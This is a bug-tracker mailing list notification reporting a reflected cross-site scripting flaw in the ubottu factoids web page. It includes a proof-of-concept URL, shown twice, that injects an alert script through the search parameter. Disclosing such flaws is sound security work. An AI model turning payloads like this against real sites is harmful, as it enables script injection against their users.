ubuntu-bots team mailing list archive

Thread
Date

[Bug 1832773] [NEW] ubottu factoids web UI XSS

To: ubuntu-bots@xxxxxxxxxxxxxxxxxxx
From: Tom Reynolds <1832773@xxxxxxxxxxxxxxxxxx>
Date: Thu, 13 Jun 2019 21:17:04 -0000
Reply-to: Bug 1832773 <1832773@xxxxxxxxxxxxxxxxxx>
Sender: bounces@xxxxxxxxxxxxx

*** This bug is a security vulnerability ***

Public security bug reported:

Try this in Firefox or anything not based on Chromium/Chrome:

http://ubottu.com/factoids.cgi?search=%22%3E%3Cscript%3Ealert%28%22I%27m+an+XSS%22%29%3C%2Fscript%3E%3Cx%3D%22

** Affects: ubuntu-bots
     Importance: Undecided
         Status: New

** Information type changed from Private Security to Public Security

-- 
You received this bug notification because you are a member of Ubuntu
IRC Bots, which is subscribed to Ubuntu IRC Bots.
https://bugs.launchpad.net/bugs/1832773

Title:
  ubottu factoids web UI XSS

Status in Ubuntu IRC Bots:
  New

Bug description:
  Try this in Firefox or anything not based on Chromium/Chrome:

  http://ubottu.com/factoids.cgi?search=%22%3E%3Cscript%3Ealert%28%22I%27m+an+XSS%22%29%3C%2Fscript%3E%3Cx%3D%22

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu-bots/+bug/1832773/+subscriptions